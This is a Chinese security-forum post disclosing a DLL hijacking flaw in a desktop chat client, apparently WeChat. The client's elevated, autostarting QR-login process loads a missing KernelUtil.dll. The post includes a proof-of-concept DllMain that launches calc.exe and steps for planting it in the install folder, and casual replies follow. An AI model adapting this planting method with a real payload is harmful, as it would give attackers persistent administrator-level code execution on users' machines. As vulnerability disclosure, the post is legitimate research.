首页
论坛
课程
招聘
[原创]V信KernelUtil.dll劫持Dll缺陷
2021-12-24 17:42 14244

[原创]V信KernelUtil.dll劫持Dll缺陷

2021-12-24 17:42
14244

V信最新64位版本(其实很久前就已经有了)存在KernelUtil.dll加载Dll劫持漏洞,该Dll本不存在安装包中,黑产可能会利用此漏洞dll劫持产品启动过程,进而执行恶意代码。


然而V信的扫码登录进程是以管理员权限开机自启动的,很多人都不会选择关掉这个自启动项。相信杀软也不敢拦截这款聊天软件的组件。


其实在TM的安装文件夹下是存在KernelUtil.dll这么个东西的,V信的安装目录不存在该Dll,但是扫码登录进程运行的时候会去加载这个不该存在的Dll。

在Process Monitor中可以看到如下图所示。


随意建立一个Dll项目写上一个加载验证的代码,编译出DLL,拷贝到软件的安装目录下,重启软件即可验证缺陷。

#include "pch.h"

#include <stdlib.h>

 

BOOL APIENTRY DllMain( HMODULE hModule,

                       DWORD  ul_reason_for_call,

                       LPVOID lpReserved

                     )

{

    switch (ul_reason_for_call)

    {

    case DLL_PROCESS_ATTACH:

        system("calc.exe");

        break;

    case DLL_THREAD_ATTACH:

    case DLL_THREAD_DETACH:

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}



这样一来,自启动和权限的问题就解决了。





【公告】 讲师招募 | 全新“预付费”模式,不想来试试吗?

最后于 2021-12-24 17:48 被绝望的皮卡丘编辑 ,原因: 修改
收藏
点赞2
打赏
分享
最新回复 (4)
雪    币: 214
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
人在鹅厂 活跃值 2021-12-24 18:00
2
0
雪    币: 1026
活跃值: 活跃值 (1030)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
killleer 活跃值 2021-12-24 18:44
3
1
内容无关,最后这个叼图到底是从哪传出来的
雪    币: 612
活跃值: 活跃值 (783)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
绝望的皮卡丘 活跃值 2021-12-27 09:11
4
0
微信表情包抠出来的
雪    币: 612
活跃值: 活跃值 (783)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
绝望的皮卡丘 活跃值 2021-12-27 09:23
5
0
killleer 内容无关,最后这个叼图到底是从哪传出来的[em_86]
微信表情包抠出来的
游客
登录 | 注册 方可回帖
返回